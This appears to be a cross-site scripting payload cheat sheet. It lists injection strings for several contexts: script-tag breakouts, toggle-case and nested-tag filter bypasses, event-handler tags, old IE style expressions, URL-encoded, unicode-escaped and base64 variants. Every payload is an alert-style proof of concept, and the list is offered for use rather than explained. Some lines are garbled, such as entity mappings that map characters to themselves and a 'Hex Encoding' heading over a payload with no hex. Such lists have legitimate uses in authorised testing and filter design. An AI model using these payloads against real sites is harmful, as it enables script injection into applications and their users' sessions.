Basic Cross-Site Scripting (XSS) Payloads:
<script>alert("Xss-By-Tapan")</script>
"><script>alert("Xss-By-Tapan")</script>
"><script>alert(/Xss-By-Tapan/)</script>
Inside Script Tag:
</script><script>alert("Xss-By-Tapan")</script>
");alert("Xss-By-Tapan");//
Bypassing Tag Restriction With Toggle Case:
"><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Tapan/)>
"><ScRiPt>alert("Xss-By-Tapan")</sCrIpT>
XSS Using Image & HTML tags:
Works Only On Chrome
"><details ontoggle=confirm(0)>
"><IMG SRC=x onerror=javascript:alert("Xss-By-Tapan")>
"><img onmouseover=alert("Xss-By-Tapan")>
"><test onclick=alert(/Xss-By-Tapan/)>Click Me</test>
"><a href=javascript:alert(/Xss-By-Tapan/)>Click Me</a>
"><h1 onmouseover=alert("Xss-By-Tapan")>Hover Me</h1>
"><svg/onload=prompt("Xss-By-Tapan")>
"><body/onload=alert("Xss-By-Tapan")>
STYLE CONTEXT:
Only Works On Older Versions of Internet Explorer (IE7, IE8)
If Input Is Inside <Style> Tag:
body{xss:expression(alert("Xss-By-Tapan"))}
If Input Is In Style=" " Attribute:
xss:expression(alert(/Xss-By-Tapan/))
Bypass Script Tag Filtering:
<<SCRIPT>alert("Xss-By-Tapan");//<</SCRIPT>
%253cscript%253ealert(/Xss-By-Tapan/)%253c/script%253e
"><s"%2b"cript>alert(/Xss-By-Tapan/)</script>
foo<script>alert(/Xss-By-Tapan/)</script>
<scr<script>ipt>alert(/Xss-By-Tapan/)</scr</script>ipt>
Advanced Payloads:
Hex Encoding
"><IMG SRC=x onerror=javascript:alert('XSS')>
"><a XSS-test href=jAvAsCrIpT:prompt(/Xss-By-Tapan/)>ClickMe
"><h1/onclick=a\u006cer\u0074(/Xss-By-Tapan/)>Click Me</h1>
"><a id="a"href=javascript:a\u006cer\u0074(/Xss-By-Muhaddi/) id="xss-test">Click me</a>#a <
<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">ClickMe
Some Alternative Useful Keywords:
Alert = a\u006cer\u0074
Prompt = p\u0072om\u0070\u0074
Confirm = co\u006efir\u006d
Javascript = jAvascript
: = :
( = (
) = )
Using alert(/Xss/) in a link = alert%28 /Xss/%29 example: <a href="javascript:alert%28 /Xss/%29">Click Me
Base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+